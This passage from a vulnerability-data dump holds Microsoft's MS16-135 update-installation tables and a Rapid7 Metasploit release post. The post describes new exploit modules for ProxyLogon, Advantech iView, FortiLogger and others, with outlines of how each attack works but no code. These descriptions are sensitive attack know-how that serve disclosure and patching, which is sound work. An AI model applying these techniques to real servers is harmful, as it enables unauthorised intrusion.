class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3198234</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-22\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <span class=\"text-base\">Security</span>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198234\" id=\"kb-link-23\" target=\"_self\">Microsoft Knowledge Base Article 3198234</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 7 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-24\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall </span>setup switch or click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-25\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-26\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2008 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197867</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197868</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-27\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>. Under <strong class=\"uiterm\">Windows Update</strong>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197867\" id=\"kb-link-28\" target=\"_self\">Microsoft Knowledge Base Article 3197867</a><br/>See <a href=\"https://support.microsoft.com/help/3197868\" id=\"kb-link-29\" target=\"_self\">Microsoft Knowledge Base Article 3197868</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-30\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-31\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-32\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197876</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197877</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197873</span><span class=\"text-base\"><br/></span>Security only</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB3197874</span><span class=\"text-base\"><br/></span>Monthly rollup</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-33\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197876\" id=\"kb-link-34\" target=\"_self\">Microsoft Knowledge Base Article 3197876</a><br/>See <a href=\"https://support.microsoft.com/help/3197877\" id=\"kb-link-35\" target=\"_self\">Microsoft Knowledge Base Article 3197877</a><br/>See <a href=\"https://support.microsoft.com/help/3197873\" id=\"kb-link-36\" target=\"_self\">Microsoft Knowledge Base Article 3197873</a><br/>See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-37\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows RT 8.1 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Deployment</span></td><td class=\"sbody-td\">The 3197874 Monthly Only update is available via <a href=\"http://go.microsoft.com/fwlink/?linkid=21130\" id=\"kb-link-38\" target=\"_self\">Windows Update</a> only.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart Requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal Information</span></td><td class=\"sbody-td\">Click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File Information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3197874\" id=\"kb-link-39\" target=\"_self\">Microsoft Knowledge Base Article 3197874</a></td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows 10 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10:<br/><span class=\"text-base\">Windows10.0-KB3198585-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1511:<br/><span class=\"text-base\">Windows10.0-KB3198586-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 10 Version 1607:<br/><span class=\"text-base\">Windows10.0-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-40\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3198585\" id=\"kb-link-41\" target=\"_self\">Microsoft Knowledge Base Article 3198585</a><br/>See <a href=\"https://support.microsoft.com/help/3198586\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base Article 3198586</a><br/>See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div><br/><br/><h4 class=\"sbody-h4\">Windows Server 2016 (all editions)</h4><span class=\"text-base\">Reference Table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2016:<br/><span class=\"text-base\">WindowsServer2016-KB3200970-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">You must restart the system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the <span class=\"text-base\">/Uninstall</span> setup switch or click <strong class=\"uiterm\">Control Panel</strong>, click <strong class=\"uiterm\">System and Security</strong>, and then click <strong class=\"uiterm\">Windows Update</strong>. Under <span class=\"sbody-userinput\">See also</span>, click <span class=\"sbody-userinput\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3200970\" id=\"kb-link-45\" target=\"_self\">Microsoft Knowledge Base Article 3200970</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> This update does not add a registry key to validate its installation.</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-46\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-47\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-48\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-49\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "edition": 3, "modified": "2016-11-11T01:17:01", "id": "KB3199135", "href": "https://support.microsoft.com/en-us/help/3199135/", "published": "2016-11-08T00:00:00", "title": "MS16-135: Security update for Windows kernel-mode drivers: November 8, 2016", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-26T18:52:42", "bulletinFamily": "info", "cvelist": ["CVE-2021-1732", "CVE-2021-21978", "CVE-2021-22652", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-3378"], "description": "## ProxyLogon\n\n\n\nMore Microsoft news this week!\n\nFirstly, a big thank you to community contributors [GreyOrder](<https://github.com/GreyOrder>), [Orange Tsai](<https://github.com/orangetw>), and [mekhalleh](<https://github.com/mekhalleh>) (RAMELLA S\u00e9bastien), who added three new [modules](<https://github.com/rapid7/metasploit-framework/pull/14860>) that allow an attacker to bypass authentication and impersonate an administrative user ([CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)) on vulnerable versions of Microsoft Exchange Server. By chaining this bug with another post-auth arbitrary-file-write vulnerability, code execution can be achieved on a vulnerable target ([CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)), allwoing an unauthenticated attacker to execute arbitrary commands.\n\nThis vulnerability affects (Exchange 2013 Versions &lt; 15.00.1497.012, Exchange 2016 CU18 &lt; 15.01.2106.013, Exchange 2016 CU19 &lt; 15.01.2176.009, Exchange 2019 CU7 &lt; 15.02.0721.013, Exchange 2019 CU8 &lt; 15.02.0792.010)\n\n## Advantech iView\n\nGreat work by our very own [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>), who added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14920>) for [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>).\n\nThis module exploits an unauthenticated configuration change vulnerability combined with an unauthenticated file write primitive, leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\\SYSTEM.\n\nThe exploit functions by first modifying the `EXPORTPATH` to be a writable path in the webroot. An export function is then leveraged to write JSP content into the previously configured path, which can then be requested to trigger the execution of an OS command within the context of the application. Once completed, the original configuration value is restored.\n\n## FortiLogger\n\nNice work by community contributor [erberkan](<https://github.com/erberkan>), who added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14830>) for [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>).\n\nThis module exploits an arbitrary file upload via an unauthenticated POST request to the &quot;/Config/SaveUploadedHotspotLogoFile&quot; upload path for hotspot settings of FortiLogger 4.4.2.2.\n\nFortiLogger is a web-based logging and reporting software designed specifically for FortiGate firewalls, running on Windows operating systems. It contains features such as instant status tracking, logging, search / filtering, reporting and hotspot.\n\n## New Modules (7)\n\n * [Microsoft Exchange ProxyLogon](<https://github.com/rapid7/metasploit-framework/pull/14860>) by GreyOrder, Orange Tsai, and mekhalleh (RAMELLA S\u00e9bastien), which adds 3 modules that leverage two Microsoft Exchange Server vulnerabilities patched in March out-of-band security updates:\n\n * A scanner module that checks if the target is vulnerable to a Server-Side Request Forgery (SSRF) identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An auxiliary module that dumps the mailboxes for a given email address, including emails, attachments and contact information. This module leverages the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>).\n * An exploit module that exploits an unauthenticated Remote Code Execution on Microsoft Exchange Server. This allows execution of arbitrary commands as the SYSTEM user, leveraging the same SSRF vulnerability identified as [CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>) and also a post-auth arbitrary-file-write vulnerability identified as [CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>).\n * [VMware View Planner Unauthenticated Log File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14875>) by wvu, Grant Willcox, and Mikhail Klyuchnikov, exploiting [CVE-2021-21978](<https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978?referrer=blog>), an arbitrary file upload vulnerability within VMWare View Planner Harness prior to 4.6 Security Patch 1.\n\n * [Advantech iView Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14920>) by wvu and Spencer McIntyre, which exploits [CVE-2021-22652](<https://attackerkb.com/topics/A4sKN6BuXQ/cve-2021-22652?referrer=blog>), allowing an unauthenticated user to make configuration changes on a remote Advantech iView server. The vulnerability can be leveraged to obtain remote code execution within the context of the server application (which runs as SYSTEM by default).\n\n * [FortiLogger Arbitrary File Upload Exploit](<https://github.com/rapid7/metasploit-framework/pull/14830>) by Berkan Er, which exploits [CVE-2021-3378](<https://attackerkb.com/topics/eTyHVvBtiM/cve-2021-3378?referrer=blog>), an unauthenticated arbitrary file upload vulnerability in FortiLogger 4.4.2.2.\n\n * [Win32k ConsoleControl Offset Confusion](<https://github.com/rapid7/metasploit-framework/pull/14907>) by BITTER APT, JinQuan, KaLendsi, LiHao, MaDongZe, Spencer McIntyre, and TuXiaoYi, which exploits [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>), an LPE vulnerability in win32k.\n\n## Enhancements and features\n\n * [#14878](<https://github.com/rapid7/metasploit-framework/pull/14878>) from [jmartin-r7](<https://github.com/jmartin-r7>) The recently introduced Zeitwerk loader is now wrapped and retained in a more flexible way. Additionally `lib/msf_autoload.rb` is now marked as a singleton class to ensure that only one instance of the loader can exist at any one time. The loading process has also been broken down into separate methods to allow for additional tweaking, extension, and suppression as needed.\n\n * [#14893](<https://github.com/rapid7/metasploit-framework/pull/14893>) from [archcloudlabs](<https://github.com/archcloudlabs>) `avast_memory_dump.rb` has been updated with additional paths to check for the `avdump.exe` utility, which should help Metasploit users in cases where the tool is bundled in with other Avast software besides the standard AV solution.\n\n * [#14917](<https://github.com/rapid7/metasploit-framework/pull/14917>) from [pingport80](<https://github.com/pingport80>) The `search` command has been updated to add in the `-s` and `-r` flags. The `-s` flag allows one to search by rank, disclosure date, module name, module type, or if the module implements a check method or not. The results will be ordered in ascending order, however users can show the results in descending order by using the `-r` flag.\n\n * [#14927](<https://github.com/rapid7/metasploit-framework/pull/14927>) from [pingport80](<https://github.com/pingport80>) The Ruby scripts under `tools/exploits/*` have been rewritten so that they capture signals and handle them gracefully instead of stack tracing.\n\n * [#14938](<https://github.com/rapid7/metasploit-framework/pull/14938>) from [adfoster-r7](<https://github.com/adfoster-r7>) The `time` command has been added to `msfconsole` to allow developers to time how long certain commands take to execute.\n\n## Bugs Fixed\n\n * [#14430](<https://github.com/rapid7/metasploit-framework/pull/14430>) from [cn-kali-team](<https://github.com/cn-kali-team>) Provides feedback to the user when attempting to use UUID tracking without a DB connection.\n\n * [#14815](<https://github.com/rapid7/metasploit-framework/pull/14815>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Replaces deprecated uses of `::Rex:Socket.gethostbyname` in favor of the newer `::Rex::Socket.getaddress` functionality in preparation of Ruby 3 support.\n\n * [#14844](<https://github.com/rapid7/metasploit-framework/pull/14844>) from [dwelch-r7](<https://github.com/dwelch-r7>) This moves the on_session_open event until after the session has been bootstrapped which is necessary to expose some functionality required by plugins such as auto_add_route.\n\n * [#14879](<https://github.com/rapid7/metasploit-framework/pull/14879>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) The `ssh_login_pubkey.rb` module has been updated to support specifying the path to a private key for the `KEY_PATH` option, and to improve error handling in several places to reduce stack traces and make error messages are more understandable.\n\n * [#14896](<https://github.com/rapid7/metasploit-framework/pull/14896>) from [AlanFoster](<https://github.com/AlanFoster>) The `apache_activemq_upload_jsp` exploit has been updated so that it can successfully exploit vulnerable systems running Java 8. Additionally, module documentation has been added.\n\n * [#14910](<https://github.com/rapid7/metasploit-framework/pull/14910>) from [friedrico](<https://github.com/friedrico>) `filezilla_client_cred.rb` has been updated to prevent it from falsely identifying strings as being Base64 encoded when they are not. The new code now checks that the string is marked as being Base64 encoded before attempting to decode it.\n\n * [#14912](<https://github.com/rapid7/metasploit-framework/pull/14912>) from [bcoles](<https://github.com/bcoles>) The `netgear_r6700_pass_reset.rb` module has been updated to fix a typo that could occasionally cause the `check` function to fail, and to fix a stack trace caused by calling a method on a `nil` object.\n\n * [#14930](<https://github.com/rapid7/metasploit-framework/pull/14930>) from [adfoster-r7](<https://github.com/adfoster-r7>) This fixes a bug where the highlighting in msfconsole's search command would break when the search term was certain single letter queries.\n\n * 